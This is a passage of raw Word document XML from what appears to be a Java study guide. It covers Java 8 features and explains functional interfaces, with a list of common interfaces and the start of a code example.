                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Method References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D8CF008" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Shorthand for lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="2A9C719A" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8F84E1" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Optional Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E984E7" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Avoids null pointer exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="49915634" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBEF90F" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date and Time API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F65A5AB" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Modern date/time classes in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>java.time</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> package</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="00C3BA3E" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67A4F4DC" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Nashorn Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E52924F" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>JavaScript execution in Java (deprecated in later)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3E7194" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F71F297" w14:textId="77777777" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc196307694"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="144AF009" w14:textId="4272D5BD" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">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Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is an interface that has exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These interfaces can have any number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but they must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be considered functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E73807" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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Functional interfaces are a key component of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expression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Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java (introduced in Java 8). They allow you to treat instances of these interfaces as first-class functions, passing them as arguments to methods, returning them from methods, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D2534" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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Characteristics of a Functional Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6932BA" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ne Abstract Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A functional interface must have exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CBE68F" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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an Have Multiple Default or Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can have default or static methods, but they don’t count towards the count of abstract methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58BF63" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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d with Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Functional interfaces are commonly used with lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2FEBA" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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mon Functional Interfaces in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2DD2C" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unnable (with run() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534B8BEB" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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llable (with call() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14439349" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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arator (with compare() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7613FC" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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nction (with apply() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE99AC9" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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sumer (with accept() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4151E" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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edicate (with test() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B02BB" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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pplier (with get() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7489E3" w14:textId="77777777" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145" w:rsidP="009D5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a Functional Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAC989" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A243EA" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyFunctionalInterface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41145C39" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Single abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522C5FB" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> doSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62120EC4" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD5436" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Can have default methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052481C0" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> defaultMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649245F7" w14:textId="77777777" w:rsidR="00C023F6" w:rsidRPr="00C023F6" w:rsidRDefault="00C023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8730911"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
